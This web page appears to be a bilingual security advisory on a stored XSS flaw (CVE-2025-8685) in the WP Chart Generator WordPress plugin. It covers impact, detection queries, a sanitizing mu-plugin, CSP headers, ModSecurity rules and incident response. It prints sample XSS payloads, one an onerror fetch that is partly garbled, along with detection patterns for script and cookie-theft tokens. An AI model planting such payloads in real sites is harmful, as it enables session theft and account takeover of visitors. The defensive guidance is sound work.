| Nom du plugin | Générateur de graphiques Wp |
|---|---|
| Type de vulnérabilité | XSS stocké authentifié |
| Numéro CVE | CVE-2025-8685 |
| Urgence | Faible |
| Date de publication CVE | 2025-08-11 |
| URL source | CVE-2025-8685 |
Avis de vulnérabilité : Générateur de graphiques WP (≤ 1.0.4) — XSS stocké par un contributeur authentifié via le shortcode [wpchart] (CVE‑2025‑8685)
Résumé exécutif
This advisory describes a stored cross-site scripting (XSS) vulnerability in the “WP Chart Generator” WordPress plugin (versions ≤ 1.0.4), tracked as CVE‑2025‑8685. An authenticated user with Contributor privileges (or higher) can store malicious payloads via the plugin’s [wpchart] shortcode. Because the payload is persistent, visitors who view the affected page may execute attacker-controlled JavaScript in their browsers.
La gravité est considérée comme faible à moyenne dans la divulgation rapportée (vecteur CVSS ~6.5) car l'exploitation nécessite un compte de contributeur authentifié. Il n'y a pas de correctif officiel du fournisseur au moment de la publication. Cet avis fournit des détails techniques, des méthodes de détection, des options d'atténuation à court terme, des conseils de remédiation pour les développeurs, des exemples de règles WAF/ModSecurity, et une liste de contrôle de réponse aux incidents du point de vue d'un praticien de la sécurité expérimenté de Hong Kong.
Quelle est la vulnérabilité ?
- Logiciel affecté : Plugin Générateur de graphiques WP
- Versions affectées : ≤ 1.0.4
- Type de vulnérabilité : XSS stocké dans le rendu du shortcode [wpchart]
- Privilège requis : Contributor (ou supérieur)
- Publié : 11 août 2025
- CVE : CVE‑2025‑8685
- Correctif officiel : Aucun au moment de la publication
Le plugin rend des attributs de shortcode non fiables et/ou du contenu interne directement dans le HTML/JS front-end sans une bonne désinfection et échappement. Un contributeur peut créer du contenu avec un shortcode [wpchart] conçu contenant des fragments de script ou des gestionnaires d'événements. Lorsqu'il est rendu, le navigateur exécute le JavaScript injecté dans l'origine du site.
Pourquoi cela importe (analyse d'impact)
Le XSS stocké reste à haut risque même lorsque l'accès initial nécessite peu de privilèges. Impacts clés :
- Les charges utiles persistantes s'exécutent chaque fois que les visiteurs consultent la page, élargissant l'exposition.
- Le JavaScript exécuté s'exécute avec les privilèges d'origine de la page : il peut tenter de voler des cookies (s'ils ne sont pas HttpOnly), effectuer des actions au nom des utilisateurs connectés, afficher une interface de phishing ou rediriger les visiteurs, et charger d'autres ressources malveillantes (chaînes d'exploitation, chargeurs, cryptomineurs).
- De nombreux sites permettent des comptes de contributeurs (par exemple, blogs multi-auteurs, sites d'adhésion), donc un attaquant peut obtenir ou créer de tels comptes.
- Les comptes d'éditeur/admin visualisant le contenu front-end tout en étant connectés augmentent le risque d'escalade de privilèges ou de prise de contrôle de compte.
À quoi ressemble l'exploitation — aperçu technique de haut niveau
Le plugin enregistre un [wpchart] shortcode qui accepte des attributs (étiquettes, titres, tableaux de données, couleurs). La vulnérabilité survient lorsque ces attributs sont intégrés dans HTML ou JavaScript en ligne sans échappement contextuel.
- Un attaquant obtient ou crée un compte Contributeur.
- Ils ajoutent un article ou une page contenant un
[wpchart]shortcode avec des attributs ou un contenu interne portant des fragments de script ou des gestionnaires d'événements. - La charge utile est stockée dans la base de données. Lorsque la page est servie, le navigateur analyse le balisage ou le script injecté et l'exécute.
- Tout visiteur (y compris les éditeurs/admins connectés) peut déclencher la charge utile.
Charges utiles illustratives (ne pas déployer sur des sites publics) :
[wpchart title=""]</code></pre>
<pre><code>[wpchart data='[{"label":"<img src="x" onerror="fetch(\"https:>","value":10}]']</code></pre>
<p>La cause profonde est le rendu d'entrées non fiables dans des contextes HTML/JS sans échappement ni validation.</p>
</section>
<section>
<h2 id="exploitation-scenarios-and-who-is-at-risk">Scénarios d'exploitation et qui est à risque</h2>
<ul>
<li>Sites permettant aux contributeurs de créer du contenu (sites d'adhésion ou multi-auteurs).</li>
<li>Sites avec enregistrement social, auteurs importés en masse ou contrôles de compte faibles.</li>
<li>Sites où les éditeurs/admins prévisualisent ou voient le contenu frontal tout en étant authentifiés.</li>
<li>Les visiteurs publics et les clients peuvent être affectés (dommages à la vie privée et à la réputation).</li>
<li>Les sites de commerce sont particulièrement sensibles en raison du risque de manipulation des flux de paiement.</li>
</ul>
</section>
<section>
<h2 id="detection-how-to-find-vulnerable-or-exploited-instances">Détection — comment trouver des instances vulnérables ou exploitées</h2>
<p>Rechercher des articles, des pages et des métadonnées pour <code>[wpchart]</code> instances et fragments de type script.</p>
<h3 id="wp-cli">WP-CLI</h3>
<pre><code># Rechercher des publications et des pages pour 'wpchart' wp post list --post_type='post,page' --format=ids | xargs -n1 -I% wp post get % --field=post_content | grep -n '\[wpchart'
</code></pre>
<h3 id="sql">SQL</h3>
<pre><code>-- Rechercher post_content pour le shortcode wpchart SELECT ID, post_title FROM wp_posts WHERE post_content LIKE '%[wpchart%';
</code></pre>
<p>Rechercher des jetons suspects : <code><script</code>, <code>onerror=</code>, <code>onload=</code>, <code>javascript:</code>, <code>document.cookie</code>, <code>fetch(</code>, and encoded equivalents (e.g., <code><script></code>, <code>%3Cscript%3E</code>).</p>
<pre><code>SELECT ID, post_title, post_content
FROM wp_posts
WHERE post_content REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Also search postmeta and plugin options where chart configurations may be stored:</p>
<pre><code>SELECT post_id, meta_key, meta_value
FROM wp_postmeta
WHERE meta_value LIKE '%wpchart%'
OR meta_value REGEXP '(?i)(<script|onerror=|javascript:|document.cookie|fetch\\()';
</code></pre>
<p>Examine webserver logs for POSTs creating/updating content and for outbound requests to suspicious domains originating from page views.</p>
</section>
<section>
<h2 id="short-term-mitigations-site-owners-and-admins">Short-term mitigations (site owners and admins)</h2>
<p>If an immediate vendor patch is unavailable, take the following actions to reduce exposure:</p>
<ol>
<li><strong>Remove or deactivate the plugin (preferred):</strong> If chart functionality is not required immediately, deactivate and remove the plugin until fixed.</li>
<li><strong>Restrict Contributor accounts:</strong> Temporarily disable new registrations or change default role to Subscriber. Review contributors and suspend or reset passwords for suspicious accounts.</li>
<li><strong>Review content and remove malicious shortcodes:</strong> Search posts/pages and sanitize or remove any <code>[wpchart]</code> occurrences that include script-like patterns.</li>
<li><strong>Temporary server-side sanitizer (virtual patch):</strong> Override the shortcode with a safe handler to sanitize attributes and content. Example mu-plugin snippet:</li>
</ol>
<pre><code><?php
// mu-plugin/wpchart-sanitizer.php
if ( ! function_exists( 'wpchart_sanitized_handler' ) ) {
function wpchart_sanitized_handler( $atts = [], $content = '' ) {
// Basic attribute sanitization example
$atts = array_map( 'sanitize_text_field', (array) $atts );
// whitelist numeric attributes
if ( isset( $atts['width'] ) ) {
$atts['width'] = intval( $atts['width'] );
}
if ( isset( $atts['height'] ) ) {
$atts['height'] = intval( $atts['height'] );
}
// sanitize content using a safe allowlist
$content = wp_kses( $content, array(
'a' => array( 'href' => true, 'title' => true ),
'span' => array( 'class' => true ),
) );
// Build safe output (example: escaped)
$title = isset( $atts['title'] ) ? esc_html( $atts['title'] ) : '';
return '<div class="wpchart-safe" data-config="' . esc_attr( json_encode( $atts ) ) . '">' . $title . $content . '</div>';
}
// Remove original shortcode if registered and register safe handler
remove_shortcode( 'wpchart' );
add_shortcode( 'wpchart', 'wpchart_sanitized_handler' );
}
?>
</code></pre>
<p>Notes: place this as an mu-plugin so it loads early. This is a temporary mitigation to neutralize stored payloads before rendering.</p>
<ol start="5">
<li><strong>Harden browser-side controls:</strong> Implement a Content Security Policy (CSP) that blocks inline scripts and restricts script sources. Example header:
<pre><code>Content-Security-Policy: default-src 'self'; script-src 'self' https://trusted-cdn.example.com; object-src 'none'; base-uri 'self'; frame-ancestors 'none'</code></pre>
<p> Also ensure cookies use Secure and HttpOnly flags and consider SameSite settings.</li>
<li><strong>Deploy rule-based request filters:</strong> Use host-level or application-layer filters to block content submissions containing script-like payloads targeted at the <code>[wpchart]</code> shortcode (examples below).</li>
</ol>
</section>
<section>
<h2 id="waf-modsecurity-rules-examples">WAF / ModSecurity rules (examples)</h2>
<p>Below are example ModSecurity rules to block common XSS patterns related to <code>[wpchart]</code>. Test thoroughly before applying to production.</p>
<pre><code># ModSecurity example
SecRule REQUEST_URI|REQUEST_BODY "@rx \[wpchart[^\]]*(<script|onerror=|onload=|javascript:|document\.cookie|fetch\()" \
"id:1001001,phase:2,deny,log,status:403,msg:'Blocked stored XSS attempt in wpchart shortcode',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_METHOD "^POST$" \
"chain, id:1001002,phase:2,deny,log,status:403,msg:'Blocked POST containing script tag',severity:2"
SecRule REQUEST_BODY "@rx <\s*script\b" "t:none"
</code></pre>
<pre><code>SecRule REQUEST_BODY "@rx \[wpchart[^\]]*(onerror|onload|javascript:|document\.cookie|window\.location)" \
"id:1001003,phase:2,deny,log,status:403,msg:'Blocked suspicious attribute inside wpchart',severity:2"
</code></pre>
<pre><code>SecRule REQUEST_URI "@rx /wp-admin/post.php|/wp-admin/post-new.php" \
"phase:2,id:1001004,deny,log,status:403,msg:'Blocked potential XSS payload in post content',chain"
SecRule REQUEST_BODY "@rx (onerror|onload|<\s*script|javascript:|document\.cookie|fetch\()" "t:none"
</code></pre>
<p>Guidance:</p>
<ul>
<li>Target rules narrowly (match the <code>[wpchart]</code> token and plugin-specific meta keys) to reduce false positives.</li>
<li>Log and run in monitor/report-only mode initially to tune rules, then switch to deny once confidence is established.</li>
<li>Combine with rate-limiting to mitigate repeated attempts.</li>
</ul>
</section>
<section>
<h2 id="recommended-permanent-code-fixes-for-plugin-developers">Recommended permanent code fixes for plugin developers</h2>
<p>Developers should address the root causes with robust validation and context-aware escaping:</p>
<ol>
<li><strong>Sanitize input on accept:</strong> Use typed validation for numeric fields (intval(), floatval()), use <code>sanitize_text_field()</code> for simple strings, and parse & validate JSON configuration server-side.</li>
<li><strong>Escape output per context:</strong> Use <code>esc_attr()</code> for attribute values, <code>esc_html()</code> for text nodes and <code>wp_kses()</code> with strict allowlists for any permitted HTML. Avoid echoing unchecked input into inline scripts.</li>
<li><strong>Prefer data-* attributes:</strong> Emit sanitized JSON inside a data attribute via <code>wp_json_encode()</code> and let a vetted client-side script consume that data safely.</li>
<li><strong>Enforce capability checks and nonces:</strong> For any AJAX endpoints or admin UI that stores content, enforce <code>current_user_can()</code> and <code>check_admin_referer()</code>.</li>
<li><strong>Example safe shortcode output pattern:</strong></li>
</ol>
<pre><code>function wpchart_safe_shortcode( $atts = [], $content = '' ) {
$atts = shortcode_atts( array(
'title' => '',
'width' => 600,
'height' => 400,
'data' => '[]',
), $atts, 'wpchart' );
// Sanitize / validate
$safe = array(
'title' => sanitize_text_field( $atts['title'] ),
'width' => intval( $atts['width'] ),
'height' => intval( $atts['height'] ),
);
// For JSON data: decode and validate structure; re-encode safely
$data = json_decode( wp_unslash( $atts['data'] ), true );
if ( ! is_array( $data ) ) {
$data = array();
}
// Validate each data point (example)
$validated_data = array();
foreach ( $data as $row ) {
$label = isset( $row['label'] ) ? sanitize_text_field( $row['label'] ) : '';
$value = isset( $row['value'] ) ? floatval( $row['value'] ) : 0;
$validated_data[] = array( 'label' => $label, 'value' => $value );
}
// Output: store config safely in data attribute and escape it for HTML
$cfg = wp_json_encode( array(
'title' => $safe['title'],
'width' => $safe['width'],
'height'=> $safe['height'],
'data' => $validated_data,
) );
return sprintf(
'<div class="wpchart" data-wpchart="%s"></div>',
esc_attr( $cfg )
);
}
</code></pre>
<p>Do not build inline scripts that interpolate user-provided values. Use external, audited JS that reads sanitized <code>data-*</code> attributes.</p>
</section>
<section>
<h2 id="incident-response-if-you-suspect-exploitation">Incident response: If you suspect exploitation</h2>
<ol>
<li>Take affected page(s) offline (unpublish) or put the site into maintenance mode if widespread.</li>
<li>Identify and remove malicious posts, shortcodes or plugin meta entries (see detection section).</li>
<li>Change passwords for Contributor+ accounts and administrators. Consider forcing password resets for all users if compromise is suspected.</li>
<li>Inspect server logs for suspicious activity and block attacker IPs at host or WAF level.</li>
<li>Run a full malware scan and file integrity check. Look for added admin users, unexpected scheduled tasks, or backdoors.</li>
<li>Rotate API keys, integration tokens, and any stored credentials that could be exposed.</li>
<li>If admin accounts were compromised, audit site settings and restore from a known-clean backup if necessary.</li>
<li>Notify affected users if user data may have been exposed, following applicable privacy and breach-notification law.</li>
<li>After cleanup, re-enable stricter registration policies, enforce two-factor authentication for elevated roles, apply CSP and secure HTTP headers.</li>
<li>Monitor for re-injection attempts and maintain long-term detection rules.</li>
</ol>
</section>
<section>
<h2 id="monitoring-and-detection-after-cleanup">Monitoring and detection after cleanup</h2>
<ul>
<li>Enable logging for request filters and review blocked events.</li>
<li>Set up content integrity checks to detect reappearance of suspicious <code>[wpchart]</code> shortcodes or injected script tags.</li>
<li>Schedule weekly scans and manual reviews for a period after the incident.</li>
<li>Deploy updates in a staging environment and validate fixes before production rollout.</li>
</ul>
</section>
<section>
<h2 id="hardening-recommendations-to-reduce-xss-risk-site-wide">Hardening recommendations to reduce XSS risk site-wide</h2>
<ul>
<li>Apply principle of least privilege: limit Contributor role usage and consider custom roles with reduced capabilities.</li>
<li>Require editorial review workflows: contributors should submit for review rather than publish directly.</li>
<li>Enforce strong passwords and two-factor authentication for editors and administrators.</li>
<li>Restrict untrusted user registration or require administrator approval.</li>
<li>Use CSP in report-only mode first to identify issues, then enforce once safe.</li>
<li>Ensure session cookies are HttpOnly and Secure; consider SameSite settings.</li>
<li>Keep WordPress core and plugins updated and perform periodic security audits.</li>
</ul>
</section>
<section>
<h2 id="a-short-note-for-developers-test-for-xss-during-qa">A short note for developers: test for XSS during QA</h2>
<ul>
<li>Include input fuzzing for shortcode attributes and stored values.</li>
<li>Automate tests to detect unescaped outputs in HTML and JS contexts.</li>
<li>Review third-party chart libraries and ensure data is passed safely (prefer data-* + JSON + validated client-side rendering).</li>
<li>Maintain a clear disclosure policy and a public changelog to accelerate coordinated fixes when issues are reported.</li>
</ul>
</section>
<section>
<h2 id="frequently-asked-questions-faq">Frequently asked questions (FAQ)</h2>
<h3 id="q-if-i-am-not-using-the-wp-chart-generator-plugin-am-i-affected">Q: If I am not using the WP Chart Generator plugin, am I affected?</h3>
<p>No. This advisory concerns specifically the WP Chart Generator plugin (≤ 1.0.4). However, the general guidance applies to any plugin that renders unescaped user input.</p>
<h3 id="q-if-an-attacker-needs-a-contributor-account-is-my-site-safe">Q: If an attacker needs a Contributor account, is my site safe?</h3>
<p>Not necessarily. Many sites allow registrations that map to low-privilege roles; weak or reused passwords are a common vector. Treat user registration as a potential risk and limit privileges where possible.</p>
<h3 id="q-will-a-content-security-policy-fully-prevent-exploitation">Q: Will a Content Security Policy fully prevent exploitation?</h3>
<p>A properly configured CSP substantially reduces the impact of many XSS payloads by blocking inline scripts and restricting script origins, but CSP should complement input sanitization and server-side protections — it is not a substitute for correct coding.</p>
<h3 id="q-is-the-issue-already-patched">Q: Is the issue already patched?</h3>
<p>At the time of this advisory, no official patched release was available. Follow the plugin's release channel for updates and apply the mitigations listed here until a patch is published.</p>
</section>
<section>
<h2 id="closing-thoughts">Closing thoughts</h2>
<p>Stored XSS like CVE‑2025‑8685 can have persistent and far-reaching consequences. Although exploitation requires authenticated access, many realistic paths exist to obtain contributor-level permissions. Treat unescaped shortcode attributes and plugin-rendered client-side scripts as high priority. Immediate actions: review and sanitize content, restrict Contributor capabilities, apply temporary sanitization or request-filtering, and consider deactivating the plugin until it is fixed. Plugin authors should implement strict input validation and context-aware escaping for all shortcode attributes and stored content.</p>
<p>If you lack in-house capability to perform scans or apply mitigations, engage a trusted security practitioner or managed service to assist with detection, virtual patching and recovery steps. Maintain careful logs of remediation actions and preserve forensic artifacts if a compromise is suspected.</p>
<p style="margin-top:12px;">Stay vigilant. Review user-generated content regularly and reduce the blast radius of low-privilege user accounts.</p>
</section>
<footer style="margin-top:28px;color:#666;font-size:0.95em;">
<p>Prepared by a Hong Kong security expert. CVE record: <a href="https://www.cve.org/CVERecord/SearchResults?query=CVE-2025-8685" target="_blank" rel="noopener noreferrer">CVE-2025-8685</a>.</p>
</footer>
<p></body><br />
</html></p>
</div>
<section class="post-tags"><ul><li><h5 class="title-tags">Étiquettes :</h5></li><li><a href="https://wp-security.org/fr/tag/wordpress-security/" rel="tag">WordPress Security</a></li></ul></section> <div class="pk-share-buttons-wrap pk-share-buttons-layout-default pk-share-buttons-scheme-bold-bg pk-share-buttons-has-counts pk-share-buttons-has-total-counts pk-share-buttons-after-post pk-share-buttons-mode-php pk-share-buttons-mode-rest" data-post-id="803" data-share-url="https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" >
<div class="pk-share-buttons-total pk-share-buttons-total-no-count">
<div class="pk-share-buttons-count cs-font-primary">0 Shares:</div>
</div>
<div class="pk-share-buttons-items">
<div class="pk-share-buttons-item pk-share-buttons-facebook pk-share-buttons-no-count" data-id="facebook">
<a href="https://www.facebook.com/sharer.php?u=https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-facebook"></i>
<span class="pk-share-buttons-label pk-font-primary">Partager</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-twitter pk-share-buttons-no-count" data-id="twitter">
<a href="https://x.com/share?&text=%3Ctrp-post-container%20data-trp-post-id%3D%27803%27%3EHong%20Kong%20Security%20NGO%20warns%20WordPress%20XSS%28CVE20258685%29%3C%2Ftrp-post-container%3E&url=https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-twitter"></i>
<span class="pk-share-buttons-label pk-font-primary">Tweeter</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
<div class="pk-share-buttons-item pk-share-buttons-pinterest pk-share-buttons-no-count" data-id="pinterest">
<a href="https://pinterest.com/pin/create/bookmarklet/?url=https://wp-security.org/fr/vulnerability-database/hong-kong-security-ngo-warns-wordpress-xsscve20258685/&media=https://wp-security.org/wp-content/uploads/2025/08/2025-08-11CVE20258685Wp-chart-generator-1024x576.jpg" class="pk-share-buttons-link" target="_blank">
<i class="pk-share-buttons-icon pk-icon pk-icon-pinterest"></i>
<span class="pk-share-buttons-label pk-font-primary">Épingler</span>
<span class="pk-share-buttons-count pk-font-secondary">0</span>
</a>
</div>
</div>
</div>
<section class="post-author">
<div class="authors-compact">
<div class="author-wrap">
<div class="author">
<div class="author-avatar">
<a href="https://wp-security.org/fr/author/wp-security/" rel="author">
<img alt='' src='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=120&d=mm&r=g' srcset='https://secure.gravatar.com/avatar/16bf83a02c7c3aa39247769e866366c2ea8ccfb8bd88a16ef3ac35925a1da888?s=240&d=mm&r=g 2x' class='avatar avatar-120 photo' height='120' width='120' decoding='async'/> </a>
</div>
<div class="author-description">
<h5 class="title-author">
<span class="fn">
<a href="https://wp-security.org/fr/author/wp-security/" rel="author">
WP Security Vulnerability Report </a>
</span>
</h5>
<p class="note"></p>
</div>
</div>
</div>
</div>
</section>
<div id="disqus_thread"></div>
</div>
</div>
</article>
<div class="post-prev-next">
<a class="link-item prev-link" href="https://wp-security.org/fr/vulnerability-database/gmap-venturit-stored-xss-alert-for-hkcve20258568/">
<div class="link-content">
<div class="link-label">
<span class="link-arrow"></span><span class="link-text"> — Article précédent</span>
</div>
<h2 class="entry-title">
GMap Venturit Stored XSS Alert for HK(CVE20258568) </h2>
</div>
</a>
<a class="link-item next-link" href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-wordpress-stock-quotes-xsscve20258688/">
<div class="link-content">
<div class="link-label">
<span class="link-text">Article suivant — </span><span class="link-arrow"></span>
</div>
<h2 class="entry-title">
Hong Kong Security WordPress Stock Quotes XSS(CVE20258688) </h2>
</div>
</a>
</div>
<section class="post-archive archive-related">
<div class="archive-wrap">
<div class="title-block-wrap">
<h5 class="title-block">
Vous aimerez aussi </h5>
</div>
<div class="archive-main archive-list archive-heading-small archive-borders-enabled archive-shadow-enabled archive-scale-enabled">
<article class="entry-without-preview post-2822 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/protecting-hong-kong-websites-from-lficve202569402/" rel="bookmark">Protecting Hong Kong Websites from LFI(CVE202569402)</a></h2><ul class="post-meta"><li class="meta-date">février 13, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Local File Inclusion in WordPress R&F Theme </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-4172 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/defend-hong-kong-sites-against-open-redirectcve20266675/" rel="bookmark">Defend Hong Kong Sites Against Open Redirect(CVE20266675)</a></h2><ul class="post-meta"><li class="meta-date">avril 21, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Open Redirection in WordPress Responsive Blocks Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-3950 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-alert-amelia-sql-injectioncve20264668/" rel="bookmark">Hong Kong Security Alert Amelia SQL Injection(CVE20264668)</a></h2><ul class="post-meta"><li class="meta-date">avril 1, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
SQL Injection in WordPress Amelia Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-1046 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/hong-kong-ngo-alerts-contributors-about-xsscve20257496/" rel="bookmark">Hong Kong NGO alerts contributors about XSS(CVE20257496)</a></h2><ul class="post-meta"><li class="meta-date">août 18, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress WPC Smart Compare for WooCommerce plugin <= 6.4.7 - Authenticated (Contributor+) DOM-Based Stored Cross-Site Scripting vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-867 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/hong-kong-security-wordpress-on-demand-xsscve202554727/" rel="bookmark">Hong Kong Security WordPress On Demand XSS(CVE202554727)</a></h2><ul class="post-meta"><li class="meta-date">août 14, 2025</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
WordPress CM On Demand Search And Replace Plugin plugin <= 1.5.2 - Cross Site Scripting (XSS) Vulnerability </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
<article class="entry-without-preview post-4071 post type-post status-publish format-standard has-post-thumbnail category-vulnerability-database tag-wordpress-security">
<div class="post-outer">
<div class="post-inner">
<div class="meta-category"><a class="category-style" href="https://wp-security.org/fr/category/vulnerability-database/"><span style="background-color:#EDF2FF" data-color="#EDF2FF" data-color-dark="#555555" class="char" data-scheme="default">W</span><span class="label">WordPress Vulnerability Database</span></a></div> <header class="entry-header">
<h2 class="entry-title"><a href="https://wp-security.org/fr/vulnerability-database/community-advisory-eshot-plugin-access-vulnerabilitycve20263642/" rel="bookmark">Community Advisory Eshot Plugin Access Vulnerability(CVE20263642)</a></h2><ul class="post-meta"><li class="meta-date">avril 15, 2026</li></ul> </header>
<div class="entry-details">
<div class="entry-excerpt">
Broken Access Control in WordPress e-shot Plugin </div>
</div>
</div><!-- .post-inner -->
</div><!-- .post-outer -->
</article>
</div>
</div>
</section>
</main>
</div><!-- .content-area -->
</div><!-- .main-content -->
</div><!-- .cs-container -->
</div><!-- .site-content -->
<footer id="colophon" class="site-footer">
<div class="footer-subscribe">
<div class="cs-container">
<div class="subscribe-wrap">
</div>
</div>
</div>
<div class="footer-info">
<div class="cs-container">
<div class="site-info">
<div class="footer-col-info">
<span class="site-title footer-title" href="https://wp-security.org/fr/" rel="home">
<img src="https://wp-security.org/wp-content/uploads/2025/08/WP-Security-logo-1-e1754494371106.png" alt="WP Security" > </span>
<div class="footer-copyright">
© 2025 WP-Security.org Disclaimer: WP-Security.org is an independent, non-profit NGO community committed to sharing WordPress security news and information. We are not affiliated with WordPress, its parent company, or any related entities. All trademarks are the property of their respective owners. </div>
</div>
</div>
</div>
</div>
</footer>
</div>
</div><!-- .site-inner -->
</div><!-- .site -->
<template id="tp-language" data-tp-language="fr_FR"></template><script type="speculationrules">
{"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/fr/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/squaretype/*","/fr/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
</script>
<a href="#top" class="pk-scroll-to-top">
<i class="pk-icon pk-icon-up"></i>
</a>
<div class="pk-mobile-share-overlay">
</div>
<script type="text/javascript">
var _paq = _paq || [];
_paq.push(['setCustomDimension', 1, '{"ID":3,"name":"WP Security Vulnerability Report","avatar":"f7de7e299d4a4b4c92c6f2c2a29a7ca7"}']);
_paq.push(['trackPageView']);
(function () {
var u = "https://analytics2.wpmudev.com/";
_paq.push(['setTrackerUrl', u + 'track/']);
_paq.push(['setSiteId', '24942']);
var d = document, g = d.createElement('script'), s = d.getElementsByTagName('script')[0];
g.type = 'text/javascript';
g.async = true;
g.defer = true;
g.src = 'https://analytics.wpmucdn.com/matomo.js';
s.parentNode.insertBefore(g, s);
})();
</script>
<script id='kirki-viewport-lists'>var kirkiViewports = {"md":{"value":1200,"scale":1,"minWidth":1200,"maxWidth":1200,"title":"Desktop","icon":"desktop","activeIcon":"desktop-hover","id":"md","type":"max"},"tablet":{"value":991,"scale":1,"minWidth":991,"maxWidth":991,"title":"Tablet","icon":"tablet-default","activeIcon":"tablet-hover","type":"max","id":"tablet"},"mobileLandscape":{"value":767,"scale":1,"minWidth":767,"maxWidth":767,"title":"Landscape","icon":"phone-hr-default","activeIcon":"phone-hr-hover","type":"max","id":"mobileLandscape"},"mobile":{"value":575,"scale":1,"minWidth":575,"maxWidth":575,"title":"Mobile","icon":"phone-vr-default","activeIcon":"phone-vr-hover","type":"max","id":"mobile"}};</script><script id='kirki-variable-lists'>var kirkiCSSVariable = {"data":[{"title":"Colors","key":"color","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Numbers","key":"size","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Text Styles","key":"text-style","modes":[{"title":"Default","key":"default"}],"variables":[]},{"title":"Font Family","key":"font-family","modes":[{"title":"Default","key":"default"}],"variables":[]}]};</script><script id="kirki-api-and-nonce">
window.wp_kirki = {
ajaxUrl: "https://wp-security.org/wp-admin/admin-ajax.php",
restUrl: "https://wp-security.org/fr/wp-json/",
siteUrl: "https://wp-security.org",
apiVersion: "v1",
postId: "803",
nonce: "40ba390b8d",
call_from: "",
templateId: "",
context: {"id":803,"type":"post"}
};
</script><script type="importmap" id="wp-importmap">
